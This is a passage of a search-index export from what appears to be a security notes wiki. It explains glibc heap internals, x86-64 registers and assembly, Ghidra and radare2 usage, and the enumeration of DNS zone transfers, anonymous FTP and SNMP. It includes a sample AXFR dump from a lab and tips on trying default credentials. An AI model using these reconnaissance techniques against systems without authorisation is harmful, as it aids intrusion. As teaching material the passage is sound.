If this bit is 0, the chunk belongs to the main arena (the main heap). If this bit is 1, the chunk belongs to a non-main arena created for another thread; such arenas live in mmap-ed heaps, and the heap's header (and therefore its arena) can be computed from the chunk's address by rounding it down to the heap alignment. M (0x02) - If this bit is set, then the chunk was mmap-ed and isn't part of any heap or arena. Typically used for large allocations. P (0x01) - If this bit is set, then the previous chunk is still in use and must not be considered for coalescing. If it is clear, the previous chunk is free and the prev_size field at the very start of the current chunk holds its size, which is how the allocator walks backwards to merge the two. Since chunk sizes are multiples of 8 or 16 bytes, the low three bits of the size field would otherwise always be zero, which is why they can be reused for these flags. A free chunk looks a bit different: The size and AMP fields carry the same meaning as those in chunks that are in use. Free chunks are organised in singly or doubly linked lists called bins . The fwd and bck pointers are utilised in the implementation of those linked lists and occupy the first bytes of what used to be user data, which is why writing into a freed chunk corrupts the allocator's own lists. Different types of bins exist for different purposes. The top of the heap is by convention called the top chunk .","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Chunks","id":"287","title":"Chunks"},"288":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Memory Allocation on the Heap","id":"288","title":"Memory Allocation on the Heap"},"289":{"body":"When an application requests heap memory, the heap manager traverses the bins in search of a free chunk that is large enough to service the request. If such a chunk is found, it is removed from the bin, turned into an in-use chunk and then a pointer is returned to the user data section of the chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from Free Chunks","id":"289","title":"Allocating from Free Chunks"},"29":{"body":"A zone transfer request provides the means for copying a DNS zone file from one name server to another. This, however, only works over TCP. By doing this, you can obtain all the records of a DNS server for a particular zone. A correctly configured server only permits transfers to its own secondaries (allow-transfer in BIND); a server which honours an AXFR from an arbitrary client hands over the entire zone, which is both a misconfiguration worth reporting and a reconnaissance goldmine. 
This is done through the AXFR request type: dig @ AXFR ┌──(cr0mll0@kali)-[~]-[]\n└─$ dig @192.168.129.138 AXFR nsa.gov ; <<>> DiG 9.16.15-Debian <<>> @192.168.129.138 AXFR nsa.gov\n; (1 server found)\n;; global options: +cmd\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\nnsa.gov. 3600 IN NS ns1.nsa.gov.\nnsa.gov. 3600 IN NS ns2.nsa.gov.\nnsa.gov. 3600 IN MX 10 mail1.nsa.gov.\nnsa.gov. 3600 IN MX 20 mail2.nsa.gov.\nfedora.nsa.gov. 3600 IN TXT \"The black sparrow password\"\nfedora.nsa.gov. 3600 IN AAAA fd7f:bad6:99f2::1337\nfedora.nsa.gov. 3600 IN A 10.1.0.80\nfirewall.nsa.gov. 3600 IN A 10.1.0.105\nfw.nsa.gov. 3600 IN A 10.1.0.102\nmail1.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.25 ~all\"\nmail1.nsa.gov. 3600 IN A 10.1.0.25\nmail2.nsa.gov. 3600 IN TXT \"v=spf1 a mx ip4:10.1.0.26 ~all\"\nmail2.nsa.gov. 3600 IN A 10.1.0.26\nns1.nsa.gov. 3600 IN A 10.1.0.50\nns2.nsa.gov. 3600 IN A 10.1.0.51\nprism.nsa.gov. 3600 IN A 172.16.40.1\nprism6.nsa.gov. 3600 IN AAAA ::1\nsigint.nsa.gov. 3600 IN A 10.1.0.101\nsnowden.nsa.gov. 3600 IN A 172.16.40.1\nvpn.nsa.gov. 3600 IN A 10.1.0.103\nweb.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nwebmail.nsa.gov. 3600 IN A 10.1.0.104\nwww.nsa.gov. 3600 IN CNAME fedora.nsa.gov.\nxkeyscore.nsa.gov. 3600 IN TXT \"knock twice to enter\"\nxkeyscore.nsa.gov. 3600 IN A 10.1.0.100\nnsa.gov. 3600 IN SOA ns1.nsa.gov. root.nsa.gov. 2007010401 3600 600 86400 600\n;; Query time: 4 msec\n;; SERVER: 192.168.129.138#53(192.168.129.138)\n;; WHEN: Fri Sep 17 22:38:47 EEST 2021\n;; XFR size: 27 records (messages 1, bytes 709)","breadcrumbs":"Reconnaissance » Enumeration » DNS Server Enumeration (53) » DNS Zone Transfer","id":"29","title":"DNS Zone Transfer"},"290":{"body":"If no free chunk is found that can service the request, the heap manager must construct an entirely new chunk at the top of heap. 
To achieve this, it first needs to ascertain whether there is enough space at the top of the heap to hold the new chunk.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating from the Top Chunk","id":"290","title":"Allocating from the Top Chunk"},"291":{"body":"Once the free space at the top of the heap is used up, the heap manager will have to ask the kernel for additional memory. On the initial heap, the heap manager asks the kernel to allocate more memory at the end of the heap by calling sbrk. On most Linux-based systems this function internally uses a system call called brk. Eventually, the heap will grow to its maximum size, since expanding it any further would cause it to intrude on other sections of the process' address space. In this case, the heap manager will resort to using mmap to map new memory for heap expansions. If mmap also fails, then the process is unable to allocate more memory and malloc returns NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Requesting Additional Memory at the Top of the Heap from the Kernel","id":"291","title":"Requesting Additional Memory at the Top of the Heap from the Kernel"},"292":{"body":"Large chunks get treated differently in their allocation. These are allocated off-heap through the direct use of mmap calls and this is reflected in the chunk's metadata by setting the M bit to 1. When such allocations are later returned to the heap manager via a call to free, the heap manager releases the entire mmap-ed region back to the system via munmap. Different platforms have different default thresholds for what counts as a large chunk and what doesn't. On glibc the default threshold is 128 KiB, and it is raised dynamically (up to 32 MiB on 64-bit systems) whenever an mmap-ed chunk is freed, on the assumption that the program will ask for that size again and should be served from the heap next time.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocating Large Chunks","id":"292","title":"Allocating Large Chunks"},"293":{"body":"Multithreaded applications require that internal data structures on the heap are protected from race conditions. 
In the past, the heap manager availed itself of a global mutex before every heap operation, however, significant performance issues arose as a result. Consequently, the concept of \"arenas\" was introduced. Each arena consists of a separate heap which manages its own chunk allocation and bins. Although each arena still utilises a mutex for its internal operations, different threads can make use of different arenas to avoid having to wait for each other. The initial (main) arena consists of a single heap and for single-threaded applications it is the only arena that will ever exist. However, as more threads are spawned, new arenas are allocated and attached to them. Once all available arenas are being utilised by threads, the heap manager will commence creating new ones until a limit - 2 * Number of CPU cores for 32-bit and 8 * Number of CPU cores for 64-bit processes - is reached. Afterwards, multiple threads will be forced to share the same arena.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Arenas","id":"293","title":"Arenas"},"294":{"body":"Free chunks are organised in the so-called bins which are essentially linked lists. For performance reasons different types of bins exist. There are 62 small bins, 63 large bins, 1 unsorted bin, 10 fast bins and 64 tcache bins per thread. The last two appeared later and are built on top of the first three. Pointers to the small, large, and unsorted bins are stored in the same array in the heap manager: BIN[0] -> invalid (unused)\nBIN[1] -> unsorted bin\nBIN[2] to BIN[63] -> small bins\nBIN[64] to BIN[126] -> large bins","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Bins","id":"294","title":"Bins"},"295":{"body":"There are 62 small bins and each of them stores chunks of a fixed size. Each chunk with a size less than 512 bytes on 32-bit systems and 1024 bytes on 64-bit systems has a corresponding small bin. 
Because every chunk in a small bin has the same size, the bin is trivially sorted and insertion and removal of entries are very fast.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Small Bins","id":"295","title":"Small Bins"},"296":{"body":"There are 63 large bins and they resemble small bins in their operation, but each of them stores chunks from a range of sizes rather than a single size, kept sorted by size in decreasing order. Consequently, insertion and removal of entries on these lists is slower, since the bin has to be traversed in order to find the right position or a suitable chunk. There is a different number of bins allocated for specific chunk size ranges. The spacing begins at 64 bytes - there are 32 bins, each of which shifts the range of chunk sizes it stores by 64 bytes from the previous bin. Following are 16 bins which shift the range by 512 bytes and so on. In essence (using the 32-bit boundaries, where large bins start at 512 bytes; on 64-bit systems they start at 1024 bytes): Bin 1 -> stores chunks of sizes 512 - 568 bytes; Bin 2 -> stores chunks of sizes 576 - 632 bytes; ... Overall the layout is: 32 bins spaced 64 bytes apart, 16 bins spaced 512 bytes apart, 8 bins spaced 4096 bytes apart, 4 bins spaced 32768 bytes apart, 2 bins spaced 262144 bytes apart and 1 bin for all remaining chunk sizes.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Large Bins","id":"296","title":"Large Bins"},"297":{"body":"There is a single unsorted bin. A freed chunk which is too big for the tcache and the fast bins (or which has just been consolidated with its neighbours) is placed here first rather than directly into its small or large bin. The point of the unsorted bin is to speed up allocations by serving as a sort of cache: when malloc is invoked, it first traverses this bin to see if it can immediately service the request. Chunks which do not fit the request are sorted into their proper small or large bin as they are passed over, and only then does malloc move on to the small or large bins themselves.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Unsorted Bins","id":"297","title":"Unsorted Bins"},"298":{"body":"Fast bins provide a further optimisation layer. Recently released small chunks are put in fast bins and are not initially merged with their neighbours (the P bit of the following chunk is left set, so for coalescing purposes they still look in use). This allows for them to be repurposed forthwith, should a malloc request for that chunk size come very soon after the chunk's release. 
There are 10 fast bins, covering chunks of size 16, 24, 32, 40, 48, 56, 64, 72, 80, and 88 bytes plus chunk metadata. Fast bins are implemented as singly linked lists and insertions and removals of entries in them are really fast. Periodically, the heap manager consolidates the heap - chunks in the fast bins are merged with the abutting chunks and inserted into the unsorted bin. This consolidation occurs when a malloc request is issued for a size that no small bin can serve (chunks of 512 bytes or more on 32-bit systems and 1024 bytes or more on 64-bit systems, i.e. a large-bin request), when freeing a chunk larger than 64KB or when malloc_trim or mallopt is invoked.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Fast Bins","id":"298","title":"Fast Bins"},"299":{"body":"A new caching mechanism called tcache (thread local caching) was introduced in glibc version 2.26 back in 2017. The tcache stores bins of fixed size small chunks as singly linked lists. Similarly to a fast bin, chunks in tcache bins aren't merged with adjoining chunks. By default, there are 64 tcache bins, each containing a maximum of 7 same-sized chunks. The possible chunk sizes range from 12 to 516 bytes on 32-bit systems and from 24 to 1032 bytes on 64-bit systems. When a chunk is freed, the heap manager checks if the chunk fits into a tcache bin corresponding to that chunk size. If the tcache bin for this size is full or the chunk is simply too big to fit into a tcache bin, the heap manager obtains a lock on the arena and proceeds to comb through other bins in order to find a suitable one for the chunk. When malloc needs to service a request, it first checks the tcache for a chunk of the requested size that is available and should such a chunk be found, malloc will return it without ever having to obtain a lock. Because the tcache is per-thread and does no coalescing, a freed chunk of a given size is typically handed straight back by the next malloc of that size - the behaviour which makes use-after-free and double-free bugs so predictable to exploit. If the requested size has no tcache bin, malloc continues as before. A slightly different strategy is employed if the requested chunk size does have a corresponding tcache bin, but that bin is simply empty. 
In that case, malloc obtains a lock and promotes as many heap chunks of the requested size to tcache chunks, up to the tcache bin limit of 7. Subsequently, the last matching chunk is returned.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » TCache Bins","id":"299","title":"TCache Bins"},"3":{"body":"Any major changes outside of the eight category folders in the Notes/ directory are not permitted and will be rejected.","breadcrumbs":"Cyberclopaedia » Contributing » Out-of-Scope","id":"3","title":"Out-of-Scope"},"30":{"body":"The File Transfer Protocol (FTP) is a common protocol which you may find during a penetration test. It is a TCP-based protocol and runs on port 21. Luckily, its enumeration is simple and rather straight-forward. You can use the ftp command if you have credentials: ftp You can then proceed with typical navigation commands like dir, cd, pwd, get and send to navigate and interact with the remote file system. If you don't have credentials you can try with the usernames guest, anonymous, or ftp and an empty password in order to test for anonymous login.","breadcrumbs":"Reconnaissance » Enumeration » FTP Enumeration (21) » Introduction","id":"30","title":"Introduction"},"300":{"body":"","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » malloc and free","id":"300","title":"malloc and free"},"301":{"body":"First, every allocation exists as a memory chunk which is aligned and contains metadata as well as the region the programmer wants. When a programmer requests memory from the heap, the heap manager first works out what chunk size the allocation request corresponds to, and then searches for the memory in the following order: If the size corresponds with a tcache bin and there is a tcache chunk available, return that immediately. If the request is huge, allocate a chunk off-heap via mmap. 
Otherwise obtain the arena heap lock and then perform the following steps, in order: Try the fastbin/smallbin recycling strategy If a corresponding fast bin exists, try and find a chunk from there (and also opportunistically prefill the tcache with entries from the fast bin). Otherwise, if a corresponding small bin exists, allocate from there (opportunistically prefilling the tcache as we go). Resolve all the deferred frees - Otherwise merge the entries in the fast bins and move their consolidated chunks to the unsorted bin. - Go through each entry in the unsorted bin. If it is suitable, return it. Otherwise, put the unsorted entry on its corresponding small/large bin as we go (possibly promoting small entries to the tcache). Default back to the basic recycling strategy If the chunk size corresponds with a large bin, search the corresponding large bin now. Create a new chunk from scratch Otherwise, there are no chunks available, so try and get a chunk from the top of the heap. If the top of the heap is not big enough, extend it using sbrk. If the top of the heap can’t be extended because we ran into something else in the address space, create a discontinuous extension using mmap and allocate from there If all else fails, return NULL.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Allocation","id":"301","title":"Allocation"},"302":{"body":"If the pointer is NULL, do nothing. Otherwise, convert the pointer back to a chunk by subtracting the size of the chunk metadata. Perform a few sanity checks on the chunk, and abort if the sanity checks fail. If the chunk fits into a tcache bin, store it there. If the chunk has the M bit set, give it back to the operating system via munmap. Otherwise we obtain the arena heap lock and then: If the chunk fits into a fastbin, put it on the corresponding fastbin. If the chunk size is greater than 64KB, consolidate the fastbins immediately and put the resulting merged chunks on the unsorted bin. 
Merge the chunk backwards and forwards with neighboring freed chunks in the small, large, and unsorted bins. If the resulting chunk lies at the top of the heap, merge it into the top chunk. Otherwise store it in the unsorted bin.","breadcrumbs":"Reverse Engineering » Program Anatomy » The Heap » Deallocation","id":"302","title":"Deallocation"},"303":{"body":"Registers are value containers which reside on the CPU and not in RAM. They are small in size and some have special purposes. You may store both addresses and values in registers and depending on the instruction used the data inside will be interpreted in a different way - this is commonly called an addressing mode . In x86 Intel assembly (i386), the registers are 32 bits (4 bytes) in size and some of them are reserved: ebp - the base pointer, points to the bottom of the current stack frame esp - the stack pointer, points to the top of the current stack frame eip - the instruction pointer, points to the next instruction to be executed The other registers are general purpose registers and can be used for anything you like: eax, ebx, ecx, edx, esi, edi. x64 AMD assembly (amd64) extends these 32-bit registers to 64-bit ones and denotes these new versions by replacing the initial e with an r: rbp, rsp, rip, rax, ... It is important to note that these are not different registers - eax and rax refer to the same space on the CPU, however, eax only provides access to the lower 32 bits of the 64-bit register. You can also get access to the lower 16 and 8 bits of the register using different names: 8 Byte Register Lower 4 Bytes Lower 2 Bytes Lower Byte rbp ebp bp bpl rsp esp sp spl rip eip rax eax ax al rbx ebx bx bl rcx ecx cx cl rdx edx dx dl rsi esi si sil rdi edi di dil r8 r8d r8w r8b r9 r9d r9w r9b r10 r10d r10w r10b r11 r11d r11w r11b r12 r12d r12w r12b r13 r13d r13w r13b r14 r14d r14w r14b r15 r15d r15w r15b Each row contains names which refer to different parts of the same register. 
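The chunk layout, flag bits, tcache reuse and mmap path from the heap sections above, exercised from C. This is an added example rather than code from the notes; it assumes glibc (2.26 or newer, for the tcache) on 64-bit Linux and reads the size field directly from the bytes in front of the returned pointer, which is an implementation detail of glibc and not a public API. The function names are mine.

```c
/* Added example: inspect glibc malloc chunk metadata from C.
 * Assumes glibc (>= 2.26 for tcache) on 64-bit Linux. The header layout is a
 * glibc implementation detail, not a portable API. */
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define PREV_INUSE     0x1UL   /* P: previous chunk is in use (no coalescing)   */
#define IS_MMAPPED     0x2UL   /* M: chunk was obtained directly from mmap      */
#define NON_MAIN_ARENA 0x4UL   /* A: chunk belongs to a non-main (thread) arena */
#define SIZE_BITS      (PREV_INUSE | IS_MMAPPED | NON_MAIN_ARENA)

/* The size field sits in the 8 bytes just before the pointer malloc returns. */
static size_t raw_size_field(const void *user_ptr) {
    size_t field;
    memcpy(&field, (const char *)user_ptr - sizeof(size_t), sizeof field);
    return field;
}

size_t chunk_size(const void *p)        { return raw_size_field(p) & ~SIZE_BITS; }
int chunk_prev_inuse(const void *p)     { return (raw_size_field(p) & PREV_INUSE) != 0; }
int chunk_is_mmapped(const void *p)     { return (raw_size_field(p) & IS_MMAPPED) != 0; }
int chunk_non_main_arena(const void *p) { return (raw_size_field(p) & NON_MAIN_ARENA) != 0; }

/* Request n bytes: the chunk is rounded up to a multiple of 16 and carries an
 * 8-byte size field, so the low three bits are free for the flags above. */
int chunk_size_is_aligned(size_t n) {
    char *p = malloc(n);
    if (!p) return 0;
    size_t sz = chunk_size(p);
    int ok = (sz % (2 * sizeof(size_t)) == 0) && (sz >= n + sizeof(size_t));
    free(p);
    return ok;
}

/* Free then re-request the same size: the tcache hands back the chunk we just
 * freed (LIFO, no arena lock) - the reason use-after-free and double-free
 * bugs are so reliably exploitable. Returns 1 if the same chunk came back. */
int tcache_reuses_freed_chunk(size_t n) {
    char *a = malloc(n);
    if (!a) return -1;
    uintptr_t first = (uintptr_t)a;   /* remember the address, not the dangling pointer */
    free(a);
    char *b = malloc(n);
    int same = ((uintptr_t)b == first);
    free(b);
    return same;
}

/* A request far above the mmap threshold (128 KiB by default) bypasses the
 * heap entirely: the chunk is mmap-ed and the M bit is set. */
int large_request_is_mmapped(void) {
    char *p = malloc(8u << 20);   /* 8 MiB */
    if (!p) return 0;
    int m = chunk_is_mmapped(p);
    free(p);                      /* returned to the kernel via munmap */
    return m;
}

int main(void) {
    char *p = malloc(24);
    if (!p) return 1;
    printf("malloc(24): chunk size %zu, P=%d M=%d A=%d\n", chunk_size(p),
           chunk_prev_inuse(p), chunk_is_mmapped(p), chunk_non_main_arena(p));
    free(p);
    printf("tcache reuse for 24-byte requests: %d\n", tcache_reuses_freed_chunk(24));
    printf("8 MiB request served by mmap: %d\n", large_request_is_mmapped());
    return 0;
}
```

On a stock 64-bit glibc the first line reports a 32-byte chunk with P=1 (the preceding chunk, whatever it is, is in use) and M=A=0; the other two checks print 1. Run it under a different allocator (musl, jemalloc) and the size field read will be meaningless, which is itself a useful reminder that all of the above is glibc-specific.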
Note, you cannot access the lower 16 or 8 bits of the instruction pointer. Writing to a 32-bit view such as eax zero-extends into the full 64-bit register, whereas writing to the 16- or 8-bit views leaves the upper bits untouched. You might sometimes see WORD, DWORD and QWORD used as size specifiers in a similar context - on x86 a WORD is 2 bytes, a DWORD (double word) is 4 bytes and a QWORD (quad word) is 8 bytes.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Registers","id":"303","title":"Registers"},"304":{"body":"Under x64 Linux (the System V AMD64 calling convention), the first six integer or pointer function arguments are passed via registers: rdi: First Argument\nrsi: Second Argument\nrdx: Third Argument\nrcx: Fourth Argument\nr8: Fifth Argument\nr9: Sixth Argument Any further arguments are pushed onto the stack. The return value is stored in rax (eax on 32-bit machines, where the common cdecl convention passes all arguments on the stack).","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Use in x64 Linux","id":"304","title":"Register Use in x64 Linux"},"305":{"body":"Register dereferencing occurs when the value of the register is treated as an address of the actual data to be used, rather than as the data itself. This means that addresses can be stored in registers and used later - this is useful when dealing with large data sizes. For example, mov rax, [rdx] Will take the value inside rdx and treat it as an address - it will go to the location where this address points and get its data from there. It will then move this data into rax. If we hadn't used [], it would have treated the address in rdx simply as a value and moved it directly into rax.","breadcrumbs":"Reverse Engineering » Program Anatomy » Registers » Register Dereferencing","id":"305","title":"Register Dereferencing"},"306":{"body":"Ghidra is an open-source framework for reverse engineering developed by the NSA. 
It groups binaries into projects which can be shared amongst multiple people.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Introduction","id":"306","title":"Introduction"},"307":{"body":"To install Ghidra on Kali or another Debian-based distribution, you can run sudo apt install ghidra.","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Installation","id":"307","title":"Installation"},"308":{"body":"File -> New Project Non-Shared Project Select Directory Name the Project","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Creating a Project","id":"308","title":"Creating a Project"},"309":{"body":"File -> Import File Select the binary you want to import Ghidra will automatically detect certain information about the file After importing, Ghidra will display an Import Results Summary containing information about the binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Creating a Project and Loading a Binary » Loading a Binary","id":"309","title":"Loading a Binary"},"31":{"body":"You will need working knowledge of SNMP in order to follow through.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » Introduction","id":"31","title":"Introduction"},"310":{"body":"Double-clicking on a program will open it in the Code Browser. A prompt will appear for analysing the binary. Ghidra will attempt to create and label functions, as well as identify any cross-references in memory. Once the binary has been analysed you will be presented with the following screen:","breadcrumbs":"Reverse Engineering » Reverse Engineering with Ghidra » Initial Analysis » Initial Analysis","id":"310","title":"Initial Analysis"},"311":{"body":"radare2 is an open-source framework for reverse engineering. The framework includes multiple tools which all work in tandem in order to aid in the analysis of binary files. 
It uses short abbreviations for its commands - single letters - and many of its commands have subcommands which are also expressed as single letters. Luckily, you can always append a ? to a specific command in order to view its subcommands and what they do. To quit radare2, use the q command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Introduction","id":"311","title":"Introduction"},"312":{"body":"You can load a binary by invoking the r2 command: r2 <binary> You might sometimes need to also add the -e io.cache=true option in order to fix relocations in disassembly.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Loading a Binary","id":"312","title":"Loading a Binary"},"313":{"body":"aaa - analyse the binary afl - list the analysed functions axt <flag> - list all the places where a function is called. Note, you need to use the flag name that radare2 automatically creates for functions after aaa (for example sym.main or fcn.00001139).","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Analysis » Analysis","id":"313","title":"Analysis"},"314":{"body":"/ <string> - search the bytes of the binary for a specific string /w <string> - search for wide character strings like Unicode symbols","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Strings » Strings","id":"314","title":"Strings"},"315":{"body":"i - display file information ie - find the program's entry point iM - find the program's main function iz - pull the hard-coded strings from the executable (only the data sections), use izz to get the strings from the entire binary","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Binary Info » Binary Info","id":"315","title":"Binary Info"},"316":{"body":"Flags resemble bookmarks. They associate a name with a given offset in a file. 
Create a new flag: f <name> @ <offset> You can also remove a flag by appending - to the command: f- <name> List available flags: f Rename a flag: fr <old name> <new name>","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flags","id":"316","title":"Flags"},"317":{"body":"Flag names should be unique for addressing reasons. However, it is often the case that you need to have simple and ubiquitous names like loop or return. For this purpose there exist the so-called \"local\" flags, which are tied to the function where they reside. It is possible to add them using the f. command.","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Local Flags","id":"317","title":"Local Flags"},"318":{"body":"Flags can be grouped into flag spaces - a flag space is a namespace for flags, grouping together similar ones. Some flag spaces include sections, registers, symbols. These are managed with the fs command. [0x00001080]> fs?\nUsage: fs [*] [+-][flagspace|addr] # Manage flagspaces\n| fs display flagspaces\n| fs* display flagspaces as r2 commands\n| fsj display flagspaces in JSON\n| fs * select all flagspaces\n| fs flagspace select flagspace or create if it doesn't exist\n| fs-flagspace remove flagspace\n| fs-* remove all flagspaces\n| fs+foo push previous flagspace and set\n| fs- pop to the previous flagspace\n| fs-. remove the current flagspace\n| fsq list flagspaces in quiet mode\n| fss display flagspaces stack\n| fss* display flagspaces stack in r2 commands\n| fssj display flagspaces stack in JSON\n| fsr newname rename selected flagspace","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Flags » Flag Spaces","id":"318","title":"Flag Spaces"},"319":{"body":"Moving around the file requires the usage of the seek (s) command in order to change the offset at which we are. 
It takes one argument which is a mathematical expression capable of containing flag names, parentheses, addition, subtraction and multiplication of immediates, or the contents of memory using brackets. Examples: [0x00000000]> s 0x10\n[0x00000010]> s+4\n[0x00000014]> s-\n[0x00000010]> s+\n[0x00000014]> Here is a list of additional seeking commands: [0x00000000]> s?\nUsage: s # Help for the seek commands. See ?$? to see all variables\n| s Print current address\n| s.hexoff Seek honoring a base from core->offset\n| s:pad Print current address with N padded zeros (defaults to 8)\n| s addr Seek to address\n| s- Undo seek\n| s-* Reset undo seek history\n| s- n Seek n bytes backward\n| s--[n] Seek blocksize bytes backward (/=n)\n| s+ Redo seek\n| s+ n Seek n bytes forward\n| s++[n] Seek blocksize bytes forward (/=n)\n| s[j*=!] List undo seek history (JSON, =list, *r2, !=names, s==)\n| s/ DATA Search for next occurrence of 'DATA'\n| s/x 9091 Search for next occurrence of \\x90\\x91\n| sa [[+-]a] [asz] Seek asz (or bsize) aligned to addr\n| sb Seek aligned to bb start\n| sC[?] string Seek to comment matching given string\n| sf Seek to next function (f->addr+f->size)\n| sf function Seek to address of specified function\n| sf. Seek to the beginning of current function\n| sg/sG Seek begin (sg) or end (sG) of section or file\n| sl[?] [+-]line Seek to line\n| sn/sp ([nkey]) Seek to next/prev location, as specified by scr.nkey\n| so [N] Seek to N next opcode(s)\n| sr pc Seek to register\n| ss Seek silently (without adding an entry to the seek history) > 3s++ ; 3 times block-seeking\n> s 10+0x80 ; seek at 0x80+10","breadcrumbs":"Reverse Engineering » Reverse Engineering with radare2 » Seeking » Seeking","id":"319","title":"Seeking"},"32":{"body":"snmp-check is a simple utility for basic SNMP enumeration. You only need to provide it with the IP address to enumerate: snmp-check [IP] Furthermore, you have the following command-line options: -p: Change the port to enumerate. Default is 161. 
-c: Change the community string to use. Default is public, which is also the string most commonly left in place on misconfigured devices, so it is the right one to try first. -v: Change the SNMP version to use. Default is v1. There are additional arguments that can be provided but these are the salient ones.","breadcrumbs":"Reconnaissance » Enumeration » SNMP Enumeration (161) » SNMP Enumeration using snmp-check","id":"32","title":"SNMP Enumeration using snmp-check"},"320":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » Introduction","id":"320","title":"Introduction"},"321":{"body":"","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Introduction","id":"321","title":"Introduction"},"322":{"body":"Variables in assembly do not exist in the same sense as they do in higher-level programming languages. This is especially true of local variables such as those inside functions. Instead of allocating space for a particular value and having that place be \"named\" according to a variable, the compiler may use a combination of stack and heap allocations as well as registers to achieve behaviour resembling a variable. That being said, there are some parallels with higher-level programming languages as well. When manually programming assembly, it should be noted that a variable name is essentially a label for an address.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Introduction","id":"322","title":"Introduction"},"323":{"body":"Assembly constants cannot be changed during run-time execution. Their value is substituted at assembly-time (corresponding to compile-time substitution for constants in higher-level languages). Consequently, constants are not even assigned a location in memory, for they turn into hard-coded values. 
Defining constants in assembly is done in the following way: equ For example, EXAMPLE equ 0xdeadbeef","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Constants","id":"323","title":"Constants"},"324":{"body":"Static or global variables which are initialised before the programme executes are stored in the .data section. In order to define such a variable, you must give it a name, data size and value. In contrast with constants, such data can be mutated during run-time. The following data size declarations can be used: Declaration Size (in bits) Type db 8 dw 16 dd 32 dq 64 ddq 128 Integer dt 128 Floating-Point The syntax for declaring such variables is as follows: For example: byteVar db 0x1A ; byte variable","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Initialised Data","id":"324","title":"Static Initialised Data"},"325":{"body":"Static uninitialised data is stored in the .bss section. The syntax for allocating such variables is following: Such variables are usually allocated as chunks, hence the required count. The primary data types are as follows: Declaration Size (in bits) resb 8 resw 16 resd 32 resq 64 resdq 128 Some examples: bArr resb 10 ; 10 element byte array wArr resw 50 ; 50 element word array dArr resd 100 ; 100 element double array qArr resq 200 ; 200 element quad array","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Variables » Static Uninitialised Data","id":"325","title":"Static Uninitialised Data"},"326":{"body":"Data representation refers to the way that values are stored in a computer. For technical reasons, computers do not use the familiar base-10 number system but rather avail themselves of the base-2 (binary) system. 
Under this paradigm, numbers are represented as 1's and 0's.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Introduction","id":"326","title":"Introduction"},"327":{"body":"When storing an integer value, there are two ways to represent it - signed and unsigned - depending on whether the value should be entirely non-negative or may also have a \"-\" sign. Based on the number of bits used for storing a value, the value may have a different range. Size Range Size Unsigned Range Signed Range Byte (8 bits) 2^8 [0..255] [−128..+127] Word (16 bits) 2^16 [0..65,535] [−32,768..+32,767] Doubleword (32 bits) 2^32 [0..4,294,967,295] [−2,147,483,648..+2,147,483,647] Quadword (64 bits) 2^64 [0..2^64−1] [−2^63..+2^63−1] Double Quadword (128 bits) 2^128 [0..2^128−1] [−2^127..+2^127−1] Unsigned integers are represented in their typical binary form.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Integer Representation","id":"327","title":"Integer Representation"},"328":{"body":"Signed integers are represented using two's complement. In order to acquire the negative form of a number in two's complement, negate all of its bits and add 1 to the result. A corollary of this representation is that it adds no complexity to the addition and subtraction operations.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Data Representation » Two's Complement","id":"328","title":"Two's Complement"},"329":{"body":"Addressing modes refer to the supported methods for accessing and manipulating data. There are three basic addressing modes in x86-64: register, immediate and memory.","breadcrumbs":"Reverse Engineering » Assembly Programming » x86-64 » Addressing Modes » Introduction","id":"329","title":"Introduction"},"33":{"body":"snmpwalk is a much more versatile tool for SNMP enumeration. 
